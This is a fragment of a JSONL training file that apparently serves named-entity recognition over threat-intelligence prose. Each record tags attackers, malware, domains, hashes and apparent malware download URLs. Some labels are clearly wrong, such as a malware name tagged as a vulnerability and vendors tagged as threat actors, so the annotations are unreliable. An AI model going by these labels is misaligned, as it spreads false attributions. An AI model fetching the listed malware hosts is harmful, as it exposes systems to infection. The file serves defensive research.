S-DOM/mov.exe": [[478, 509]], "FILEPATH: https://naiillad.date S-DOM/ex3.exe": [[510, 545]], "FILEPATH: https://naiillad.date S-DOM/u3.exe": [[546, 580]], "FILEPATH: https://naiillad.date S-DOM/vmer.exe": [[581, 617]], "FILEPATH: https://naiillad.date S-DOM/vsync.exe": [[618, 655]], "FILEPATH: https://notepad-plus-plus.org/repository S-DOM/7.x/7.4.2/npp.7.4.2.Installer.exe": [[656, 736]], "FILEPATH: https://prof.cricket S-DOM/wp.exe": [[737, 770]], "FILEPATH: https://tvavi.win S-DOM/pago.exe": [[771, 803]]}, "info": {"id": "cyberner_stix_train_003605", "source": "cyberner_stix_train"}}
{"text": ") You should also avoid the temptation to play games from sources other than legitimate app stores ; such games are not safe and may bring harm to your reputation and your bank account . The Hong Kong government was spied on by the Winnti hackers . Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper .", "spans": {"THREAT_ACTOR: Winnti": [[232, 238]], "THREAT_ACTOR: CopyKittens": [[264, 275]], "ORGANIZATION: Facebook": [[289, 297]]}, "info": {"id": "cyberner_stix_train_003606", "source": "cyberner_stix_train"}}
{"text": "The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns .", "spans": {"ORGANIZATION: Novetta": [[26, 33]], "ORGANIZATION: International Civil Aviation Organization": [[165, 206]], "ORGANIZATION: Unit 42": [[293, 300]], "MALWARE: Trojan": [[349, 355]], "MALWARE: Bookworm": [[363, 371]]}, "info": {"id": "cyberner_stix_train_003607", "source": "cyberner_stix_train"}}
{"text": "In most so-called Western versions of the Trojan , the package names in the default configuration file are erased . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . This is of course simple but often it can be enough for a user to miss something malicious by name .", "spans": {"ORGANIZATION: TALOS": [[131, 136]], "THREAT_ACTOR: DarkHotel": [[217, 226]]}, "info": {"id": "cyberner_stix_train_003608", "source": "cyberner_stix_train"}}
{"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": {"VULNERABILITY: EternalBlue": [[20, 31]], "TOOL: Metasploit": [[43, 53]], "THREAT_ACTOR: actors": [[82, 88], [217, 223]], "ORGANIZATION: Users": [[124, 129]]}, "info": {"id": "cyberner_stix_train_003609", "source": "cyberner_stix_train"}}
{"text": "Filename : ntslwin.exe MD5 : 7e67122d3a052e4755b02965e2e56a2e Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 . templates.dotm dropped the following :", "spans": {"FILEPATH: ntslwin.exe": [[11, 22]], "FILEPATH: 7e67122d3a052e4755b02965e2e56a2e": [[29, 61]], "FILEPATH: ~de03fc12a.docm": [[73, 88]], "FILEPATH: 9d703d31795bac83c4dd90527d149796": [[95, 127]], "FILEPATH: templates.dotm": [[130, 144]]}, "info": {"id": "cyberner_stix_train_003610", "source": "cyberner_stix_train"}}
{"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll .", "spans": {"THREAT_ACTOR: Insikt Group": [[0, 12]], "MALWARE: Citrix-hosted": [[111, 124]], "MALWARE: INF files": [[302, 310]], "THREAT_ACTOR: MuddyWater": [[341, 351]], "MALWARE: Advpack.dll": [[388, 399]], "MALWARE: IEAdvpack.dll": [[408, 421]]}, "info": {"id": "cyberner_stix_train_003611", "source": "cyberner_stix_train"}}
{"text": "SpyNote RAT builder The SpyNote Remote Access Trojan ( RAT ) builder is gaining popularity in the hacking community , so we decided to study its pervasiveness . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"MALWARE: SpyNote RAT": [[0, 11]], "MALWARE: SpyNote": [[24, 31]], "THREAT_ACTOR: Cobalt group": [[258, 270]], "MALWARE: Cobalt Strike": [[279, 292]], "THREAT_ACTOR: cyber heists": [[328, 340]], "ORGANIZATION: financial institutions": [[352, 374]]}, "info": {"id": "cyberner_stix_train_003612", "source": "cyberner_stix_train"}}
{"text": "We did not apply this to any live C2 servers – we only tested this with our own servers in our lab .", "spans": {"TOOL: C2": [[34, 36]]}, "info": {"id": "cyberner_stix_train_003613", "source": "cyberner_stix_train"}}
{"text": "Android Trojan Found in Targeted Attack 26 MAR 2013 In the past , we ’ ve seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did .", "spans": {"SYSTEM: Android": [[0, 7]], "SYSTEM: Windows": [[136, 143]], "SYSTEM: Mac OS X": [[148, 156]], "THREAT_ACTOR: Lotus Blossom": [[169, 182]], "VULNERABILITY: CVE-2014-6332": [[209, 222]], "TOOL: Emissary Trojan": [[255, 270]]}, "info": {"id": "cyberner_stix_train_003614", "source": "cyberner_stix_train"}}
{"text": "Over the years Kaspersky is tracked multiple campaigns by the Animal Farm group . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": {"ORGANIZATION: Kaspersky": [[15, 24]], "THREAT_ACTOR: Animal Farm group": [[62, 79]], "MALWARE: Carbanak": [[120, 128]], "THREAT_ACTOR: attackers": [[129, 138]]}, "info": {"id": "cyberner_stix_train_003615", "source": "cyberner_stix_train"}}
{"text": "APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others .", "spans": {"THREAT_ACTOR: APT10's": [[0, 7]], "ORGANIZATION: MSPs": [[39, 43]], "FILEPATH: sample": [[327, 333]]}, "info": {"id": "cyberner_stix_train_003616", "source": "cyberner_stix_train"}}
{"text": "XLoader abuses the MessagePack ( a data interchange format ) to package the stolen data and exfiltrate it via the WebSocket protocol for faster and more efficient transmission . The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the “ Stealthy Email Stealer ” part of their arsenal .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: Lazarus": [[225, 232]], "THREAT_ACTOR: TA505": [[274, 279]]}, "info": {"id": "cyberner_stix_train_003617", "source": "cyberner_stix_train"}}
{"text": "This post discusses an earlier variant of the backdoor attributed to the MoleRATs group .", "spans": {"THREAT_ACTOR: MoleRATs": [[73, 81]]}, "info": {"id": "cyberner_stix_train_003618", "source": "cyberner_stix_train"}}
{"text": "2013 in figures A total of 143,211 new modifications of malicious programs targeting mobile devices were detected in all of 2013 ( as of January 1 , 2014 ) . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . Since Winnti is also a malware family , we always write “ Winnti Group ” when we refer to the malefactors behind the attacks . TIEDYE has similarities to RABBITHUNT , which is a backdoor written in C++ that communicates via a custom binary protocol over TCP .", "spans": {"ORGANIZATION: Wikileaks": [[174, 183]], "TOOL: Mikrotik": [[229, 237]], "TOOL: ChimayRed": [[245, 254]], "MALWARE: Winnti": [[263, 269]], "THREAT_ACTOR: Winnti Group": [[315, 327]], "MALWARE: TIEDYE": [[384, 390]], "MALWARE: RABBITHUNT": [[411, 421]]}, "info": {"id": "cyberner_stix_train_003619", "source": "cyberner_stix_train"}}
{"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities . They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law . We also identified www.gokickes.com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": {"ORGANIZATION: They": [[194, 198]], "DOMAIN: www.gokickes.com": [[347, 363]], "TOOL: C2": [[372, 374]], "MALWARE: Invader variant": [[386, 401]], "FILEPATH: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[404, 468]]}, "info": {"id": "cyberner_stix_train_003620", "source": "cyberner_stix_train"}}
{"text": "Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? this SWC was used to specifically target Turkish banking . Outlaw : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": {"SYSTEM: Android": [[47, 54]], "TOOL: SWC": [[69, 72]], "ORGANIZATION: banking": [[113, 120]], "THREAT_ACTOR: Outlaw": [[123, 129]], "FILEPATH: b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d": [[132, 196]], "MALWARE: Shellbot": [[197, 205]], "MALWARE: Backdoor.SH.SHELLBOT.AA": [[206, 229]], "VULNERABILITY: ProxyNotShell": [[243, 256]], "SYSTEM: Microsoft Exchange servers": [[279, 305]], "ORGANIZATION: Microsoft": [[308, 317]]}, "info": {"id": "cyberner_stix_train_003621", "source": "cyberner_stix_train"}}
{"text": "We observed the following customizations :", "spans": {}, "info": {"id": "cyberner_stix_train_003622", "source": "cyberner_stix_train"}}
{"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America . APT33 : 37.48.105.178 servhost.hopto.org . Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed .", "spans": {"MALWARE: HummingBad": [[0, 10]], "SYSTEM: Google Play Store": [[177, 194]], "THREAT_ACTOR: Lazarus": [[230, 237]], "ORGANIZATION: Trend Micro": [[288, 299]], "TOOL: BKDR_BINLODR.ZNFJ-A": [[303, 322]], "ORGANIZATION: financial institutions": [[350, 372]], "THREAT_ACTOR: APT33": [[396, 401]], "IP_ADDRESS: 37.48.105.178": [[404, 417]], "DOMAIN: servhost.hopto.org": [[418, 436]], "THREAT_ACTOR: Excel spreadsheets that contain socially engineered instructions": [[454, 518]], "THREAT_ACTOR: enable macros in Excel so that the malicious VBA code can be executed": [[529, 598]]}, "info": {"id": "cyberner_stix_train_003623", "source": "cyberner_stix_train"}}
{"text": "Like multiple other Chinese cyber espionage actors , TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak Trojan .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[53, 67]], "FILEPATH: Pony malware": [[263, 275]], "FILEPATH: pm.dll”": [[278, 285]], "MALWARE: Trojan": [[316, 322]]}, "info": {"id": "cyberner_stix_train_003624", "source": "cyberner_stix_train"}}
{"text": "We also found several apps containing the malware , which were developed by other developers on Google Play . The Winnti umbrella and closely associated entities has been active since at least 2009 . Finally the main network communication function GetIpListAndConnect is called . The strings are obfuscated using the stack and simple Bitwise operation .", "spans": {"SYSTEM: Google Play": [[96, 107]], "TOOL: The strings": [[280, 291]]}, "info": {"id": "cyberner_stix_train_003625", "source": "cyberner_stix_train"}}
{"text": "Then the application downloads java archive from the URL specified in json , dynamically loads it with class loader API . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket (psexec.exe) . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net .", "spans": {"MALWARE: etool.exe": [[221, 230]], "VULNERABILITY: CVE-2017-0144": [[272, 285]], "MALWARE: MS07-010": [[311, 319]], "MALWARE: checker1.exe": [[320, 332]], "MALWARE: PsExec": [[417, 423]], "MALWARE: DustySky": [[474, 482]], "THREAT_ACTOR: attackers": [[489, 498]], "MALWARE: publicly available tools": [[503, 527]], "MALWARE: Remote Administration Tools": [[550, 577]], "MALWARE: RAT": [[580, 583]], "MALWARE: Poison Ivy": [[588, 598]], "MALWARE: Nano Core": [[601, 610]], "MALWARE: XtremeRAT": [[613, 622]], "MALWARE: DarkComet": [[625, 634]], "MALWARE: Spy-Net": [[639, 646]]}, "info": {"id": "cyberner_stix_train_003626", "source": "cyberner_stix_train"}}
{"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware .", "spans": {"THREAT_ACTOR: group": [[23, 28]], "TOOL: powershell-based malware": [[57, 81]], "ORGANIZATION: social engineering": [[93, 111]], "MALWARE: KeyBoy": [[352, 358]], "MALWARE: string obfuscation routine": [[373, 399]]}, "info": {"id": "cyberner_stix_train_003627", "source": "cyberner_stix_train"}}
{"text": "SPLM / CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications , mostly deployed in the second half of 2017 by Sofacy .", "spans": {"MALWARE: SPLM": [[0, 4]], "MALWARE: CHOPSTICK": [[7, 16]], "TOOL: C++": [[80, 83]], "SYSTEM: Windows": [[84, 91]], "TOOL: COM": [[92, 95]], "THREAT_ACTOR: Sofacy": [[224, 230]]}, "info": {"id": "cyberner_stix_train_003628", "source": "cyberner_stix_train"}}
{"text": "The same happens with the package squareup.otto , which is an open-source bus implementation focused on Android implementation . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week . Similar to the newly discovered HIGHTIDE samples documented above , this malicious document dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": {"SYSTEM: Android": [[104, 111]], "MALWARE: HIGHTIDE": [[318, 326]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[439, 461]], "THREAT_ACTOR: the SolarWinds Compromise": [[511, 536]], "THREAT_ACTOR: APT29": [[539, 544]]}, "info": {"id": "cyberner_stix_train_003629", "source": "cyberner_stix_train"}}
{"text": "This document 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 appears to have been targeting a North American government organization dealing with foreign affairs .", "spans": {"FILEPATH: 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5": [[14, 78]]}, "info": {"id": "cyberner_stix_train_003630", "source": "cyberner_stix_train"}}
{"text": "Since the size is controlled by the attacker , it ’s possible to overflow the fixed size buffer with certain data .", "spans": {}, "info": {"id": "cyberner_stix_train_003631", "source": "cyberner_stix_train"}}
{"text": "Until 2013 however , earlier Duke toolsets had not been put in a proper context .", "spans": {"THREAT_ACTOR: Duke": [[29, 33]]}, "info": {"id": "cyberner_stix_train_003632", "source": "cyberner_stix_train"}}
{"text": "The case where we observed this involved WhatsApp . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists , activists , and dissidents since at least 2012 .", "spans": {"SYSTEM: WhatsApp": [[41, 49]], "MALWARE: malware": [[56, 63]], "THREAT_ACTOR: Stealth Falcon": [[188, 202]]}, "info": {"id": "cyberner_stix_train_003633", "source": "cyberner_stix_train"}}
{"text": "Throughout 2017 , we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": {"TOOL: BACKSWING": [[46, 55]], "FILEPATH: c:\\temp\\rr.exe": [[208, 222]]}, "info": {"id": "cyberner_stix_train_003634", "source": "cyberner_stix_train"}}
{"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . The malware will then install fake certificates in the system to perform a MitM attack without notifying the user .", "spans": {"MALWARE: RIPPER": [[58, 64]]}, "info": {"id": "cyberner_stix_train_003635", "source": "cyberner_stix_train"}}
{"text": "While the number of Sogu targets is currently small relative to the Poison Ivy attacks , we continue to monitor their activities .", "spans": {"ORGANIZATION: Sogu": [[20, 24]], "MALWARE: Poison Ivy": [[68, 78]]}, "info": {"id": "cyberner_stix_train_003636", "source": "cyberner_stix_train"}}
{"text": "The fake bitmap image embedded as resource The 32-bit stage 2 malware uses a customized loading mechanism ( i.e. , the PE file has a scrambled IAT and relocation table ) and exports only one function . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT . All exports contain the exact same code which will decrypt the payload , inject it into memory , and execute it . STRATOFEAR ’s code references five predefined module types that have an ID value and an internal name :", "spans": {"THREAT_ACTOR: APT33": [[233, 238]], "TOOL: DROPSHOT": [[243, 251]], "TOOL: DROPSHOT samples": [[302, 318]], "TOOL: SHAPESHIFT": [[368, 378]], "MALWARE: STRATOFEAR ’s code": [[495, 513]]}, "info": {"id": "cyberner_stix_train_003637", "source": "cyberner_stix_train"}}
{"text": "Of course , it 's also possible that whatever group The Shadow Brokers have exposed simply gained access to the Stuxnet tools secondhand , and reused them . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": {"TOOL: Stuxnet tools": [[112, 125]], "ORGANIZATION: activists": [[317, 326]]}, "info": {"id": "cyberner_stix_train_003638", "source": "cyberner_stix_train"}}
{"text": "These actors have also used Adobe Flash player vulnerabilities to gain initial entry into users' environments .", "spans": {"ORGANIZATION: Adobe": [[28, 33]], "TOOL: Flash player": [[34, 46]]}, "info": {"id": "cyberner_stix_train_003639", "source": "cyberner_stix_train"}}
{"text": "Patchwork is known for rehashing off-therack tools and malware for its own campaigns . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "TOOL: rehashing off-therack tools": [[23, 50]], "TOOL: malware": [[55, 62]]}, "info": {"id": "cyberner_stix_train_003640", "source": "cyberner_stix_train"}}
{"text": "This confirms Tropic Trooper is using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . One government official puts it very matter-of-factly: Winnti is very specific to Germany .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[14, 28]], "TOOL: Poison Ivy": [[38, 48]], "ORGANIZATION: Trend Micro": [[113, 124]], "THREAT_ACTOR: Winnti": [[215, 221]]}, "info": {"id": "cyberner_stix_train_003641", "source": "cyberner_stix_train"}}
{"text": "The software generated 2FA code as it appeared on the device ’ s display ( left ) and as available in the database ( right ) Along with the malicious DEFENSOR ID app , another malicious app named Defensor Digital was discovered . In all likelihood , Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack .", "spans": {"MALWARE: Defensor Digital": [[196, 212]], "THREAT_ACTOR: Waterbug’s": [[250, 260]], "TOOL: Crambus infrastructure": [[268, 290]], "THREAT_ACTOR: attackers": [[337, 346]], "MALWARE: SSL certificates": [[437, 453]], "MALWARE: FakeTLS": [[462, 469]], "MALWARE: Destover backdoor": [[495, 512]], "MALWARE: Escad": [[530, 535]]}, "info": {"id": "cyberner_stix_train_003642", "source": "cyberner_stix_train"}}
{"text": "Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure , identifying additional domains used by the threat actors .", "spans": {"MALWARE: Shamoon": [[67, 74]]}, "info": {"id": "cyberner_stix_train_003643", "source": "cyberner_stix_train"}}
{"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {}, "info": {"id": "cyberner_stix_train_003644", "source": "cyberner_stix_train"}}
{"text": "This version appeared as Wabi Music , and copied a popular video-sharing social networking service as its backend login page . Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights . And , While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": {"ORGANIZATION: Kaspersky Lab": [[179, 192]], "ORGANIZATION: bank": [[259, 263]], "THREAT_ACTOR: Metel": [[276, 281]], "THREAT_ACTOR: GCMAN": [[286, 291]], "THREAT_ACTOR: Carbanak group": [[321, 335]]}, "info": {"id": "cyberner_stix_train_003645", "source": "cyberner_stix_train"}}
{"text": "The additional samples targeted the same large Central Asian nation state as previously mentioned but more interestingly , one of the samples was a weaponized document also leveraging DDE and containing a non-Zebrocy payload .", "spans": {}, "info": {"id": "cyberner_stix_train_003646", "source": "cyberner_stix_train"}}
{"text": "Some of the C2 servers are located in Thailand . To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups . Using this approach , the attackers amassed at least 60 C&C servers over time . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"ORGANIZATION: Windows Defender ATP": [[128, 148]], "TOOL: C&C": [[357, 360]], "MALWARE: SocGholish": [[414, 424]], "TOOL: Cobalt Strike": [[572, 585]], "TOOL: Mimikatz": [[589, 597]]}, "info": {"id": "cyberner_stix_train_003647", "source": "cyberner_stix_train"}}
{"text": "However , they possess no banking functions , and merely steal the logins and passwords entered by users . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign . Finally , the trojan Import Address Table ( IAT ) is resolved and the file path of the process that hosts the DLL is resolved and saved in a global variable . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": {"THREAT_ACTOR: Turla": [[175, 180]], "MALWARE: trojan": [[263, 269]], "TOOL: Import Address Table": [[270, 290]], "TOOL: IAT": [[293, 296]], "TOOL: DLL": [[359, 362]], "MALWARE: INDUSTROYER": [[465, 476]], "MALWARE: INDUSTROYER.V2": [[481, 495]]}, "info": {"id": "cyberner_stix_train_003648", "source": "cyberner_stix_train"}}
{"text": "Although the threat actor responsible for the development of EventBot is still unknown and the malware does not appear to be involved in major attacks , it is interesting to follow the early stages of mobile malware development . On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis .", "spans": {"MALWARE: EventBot": [[61, 69]], "ORGANIZATION: NSA": [[363, 366]], "VULNERABILITY: ETERNALBLUE": [[391, 402]]}, "info": {"id": "cyberner_stix_train_003649", "source": "cyberner_stix_train"}}
{"text": "If he doesn ’ t have Viber , the generically-named System Updates app gets downloaded and installed instead . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers . It registers the service using the RegisterServiceCtrlHandler Windows API function . There is an apocryphal story about why he robbed banks .", "spans": {"SYSTEM: Windows": [[337, 344]]}, "info": {"id": "cyberner_stix_train_003650", "source": "cyberner_stix_train"}}
{"text": "The precautions you take online have been covered extensively in almost all of our blogs ; even so , we believe this information bears repeating . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang – a cyberespionage campaign directed at diplomatic organizations in Europe . Honeybee is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {"ORGANIZATION: FireEye's": [[190, 199]], "THREAT_ACTOR: Ke3chang": [[225, 233]]}, "info": {"id": "cyberner_stix_train_003651", "source": "cyberner_stix_train"}}
{"text": "The actor used a multi-stage infection like before , but the method was different .", "spans": {}, "info": {"id": "cyberner_stix_train_003652", "source": "cyberner_stix_train"}}
{"text": "Because commands run from cmd.exe are acted on by csrss.exe , additional evidence of command history and responses sent to the cmd console window are often discoverable by analyzing the csrss.exe process 's memory .", "spans": {"FILEPATH: cmd.exe": [[26, 33]], "FILEPATH: csrss.exe": [[50, 59], [186, 195]]}, "info": {"id": "cyberner_stix_train_003653", "source": "cyberner_stix_train"}}
{"text": "Analysts can easily extract detailed information from these trees , such as the implant DLL dropped by the installer , the command used to call rundll32.exe and load the DLL , and the registry modifications that set the DLL as a service .", "spans": {"TOOL: DLL": [[88, 91], [170, 173], [220, 223]], "FILEPATH: rundll32.exe": [[144, 156]]}, "info": {"id": "cyberner_stix_train_003654", "source": "cyberner_stix_train"}}
{"text": "The IP address is also used in the URL hardcoded into the first binary downloader .", "spans": {}, "info": {"id": "cyberner_stix_train_003655", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : binary.update-onlines.org .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: binary.update-onlines.org": [[10, 35]]}, "info": {"id": "cyberner_stix_train_003656", "source": "cyberner_stix_train"}}
{"text": "Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": {"ORGANIZATION: governments": [[21, 32]], "THREAT_ACTOR: Moafee": [[110, 116]], "THREAT_ACTOR: TEMP.Veles": [[248, 258]], "MALWARE: TRITON": [[294, 300]]}, "info": {"id": "cyberner_stix_train_003657", "source": "cyberner_stix_train"}}
{"text": "Coded with python2.7 . works as C2 server that serve a powershell agent script when requested . i didn’t find any function to encrypt the traffic between the the agent and the C2 but there are variables with name private_key , public_key so i suspect the functions removed . its make use of HTA and bas64 encoded powershell code to bypass the AV ( right now AV can catch HTA ) .", "spans": {"TOOL: python2.7": [[11, 20]], "TOOL: C2": [[32, 34], [176, 178]], "TOOL: powershell": [[55, 65], [313, 323]], "TOOL: HTA": [[291, 294], [371, 374]], "TOOL: AV": [[343, 345], [358, 360]]}, "info": {"id": "cyberner_stix_train_003658", "source": "cyberner_stix_train"}}
{"text": "Once the victim enters their account information on the landing page , the phishing attack then requests that the user log in with their email address and phone number . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008 .", "spans": {"THREAT_ACTOR: they": [[179, 183]], "TOOL: ASA's": [[241, 246]], "THREAT_ACTOR: APT29": [[338, 343]], "ORGANIZATION: Russian government": [[392, 410]]}, "info": {"id": "cyberner_stix_train_003659", "source": "cyberner_stix_train"}}
{"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": {"VULNERABILITY: Carbanak": [[32, 40]], "VULNERABILITY: CVE-2013-3660": [[209, 222]], "VULNERABILITY: CVE-2013-5065": [[301, 314]], "TOOL: EoP": [[315, 318]], "VULNERABILITY: exploit": [[319, 326]]}, "info": {"id": "cyberner_stix_train_003660", "source": "cyberner_stix_train"}}
{"text": "In the Spark campaign , the lure documents and links point to one of two file sharing websites , Egnyte or Dropbox .", "spans": {"MALWARE: Spark": [[7, 12]], "TOOL: Egnyte": [[97, 103]], "TOOL: Dropbox": [[107, 114]]}, "info": {"id": "cyberner_stix_train_003661", "source": "cyberner_stix_train"}}
{"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": {"MALWARE: malicious document": [[45, 63]], "TOOL: emails": [[183, 189]], "FILEPATH: malicious attachments": [[195, 216]], "MALWARE: Scout": [[265, 270]]}, "info": {"id": "cyberner_stix_train_003662", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : darkhero.org .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: darkhero.org": [[10, 22]]}, "info": {"id": "cyberner_stix_train_003663", "source": "cyberner_stix_train"}}
